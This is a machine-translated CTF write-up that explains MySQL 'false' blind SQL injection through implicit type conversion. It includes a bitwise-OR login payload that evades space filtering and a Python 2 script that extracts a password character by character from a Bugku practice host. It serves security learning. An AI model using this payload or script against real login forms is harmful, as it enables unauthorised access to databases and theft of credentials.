Shulou(Shulou.com)06/01 Report--

In this issue, Xiaobian will bring you about the basic principle of False Blinding. The article is rich in content and analyzed and described from a professional perspective. After reading this article, I hope you can gain something.

0×01 Preface

False blind notes can sometimes bypass some WAF, and are easily overlooked details. The purpose of Xiaobian is to learn the injection principle while doing CTF, and at the same time apply its own ability. Here is just a brief description of some of my own understanding, perhaps online there are better ideas and insights, are worth learning.

0×02 false Injection principle

MYSQL implicit type conversion, when a string and a number are compared, the string will be converted to a floating point number, and the string conversion will produce a warning, the result of the conversion is 0, but if the string starts with a number, it will still be truncated from the number part and converted to a number.

0×03 Example

An example address is:

http://118.89.219.210:49167/index.php（Bugku）

After entering username and password, Burp captures the package and sends to repeater to analyze it.

Found a lot of filtered spaces,%0a,/** union, etc.

but| (bit OR)&(bit AND)^(bit XOR) Not filtered

All the words here should work. I tried them.|(bitwise OR) and ^(bitwise XOR), both of which are possible

Construct a payload statement as:

username=admin'|(ascii(mid((password)from(1)))>53)#&password=sd

Function description:

MID(column_name,start[,length]) The above format is used because of the reason for filtering out spaces

ASCII() Returns the ASCII value of the leftmost character of a character expression

When the ascii code value of the first letter is 53, the expression on the right is false, which is equivalent to 'admin' or 0.| 0 The result is 0. When username=0, all the data in the query field is returned (as long as username does not start with a number). Note that bitwise or has higher priority than =, so bitwise or is assigned to username first.

Of course, if you want to construct 0, you don't just have bitwise operators, you also have +('+'=0), -('-'=0), *('*'=0), /(''/1=0), % remainder (''%1=0), and so on.

You can first determine the length of the field:

According to the page information, it is judged as 32 bits

The principle is almost explained

You can do it yourself, but it seems too much trouble.

You can write a Python script to run it

import requestsurl = "http://118.89.219.210:49167/index.php"r = requests.Session()result=''for i in range(1,33): for j in range(37,127): payload = "admin'|(ascii(mid((password)from({0})))>{1})#".format(str(i),str(j)) data={"username":payload,"password":"psdvs"} print payload html=r.post(url,data=data) if "password error" in html.content: result+=chr(j) print result breakprint result

The results are:

The above is what is the basic principle of False Blind Note shared by Xiaobian. If there is a similar doubt, please refer to the above analysis for understanding. If you want to know more about it, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.